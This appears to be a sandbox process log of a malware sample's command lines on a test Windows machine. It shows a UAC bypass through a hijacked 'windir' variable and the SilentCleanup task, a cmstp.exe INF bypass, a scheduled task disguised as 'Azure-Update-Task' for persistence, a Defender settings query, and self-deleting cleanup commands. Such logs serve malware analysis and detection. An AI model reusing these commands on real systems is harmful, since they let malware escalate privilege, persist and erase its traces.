GFDyrtucbvfdg.exe "C:\ProgramData\GFDyrtucbvfdg.exe"
1632cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit
2548taskkill.exe taskkill /pid 2364
2228schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp"
3724reg.exe reg delete hkcu\Environment /v windir /f
3168reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
3212schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
3256reg.exe reg delete hkcu\Environment /v windir /f
3572cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\b3hfotbm.inf
3112powershell.exe "powershell" Get-MpPreference -verbose
3088schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
3404cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
2440timeout.exe timeout /T 10 /NOBREAK
1756explorer.exe C:\Windows\Explorer.EXE
1848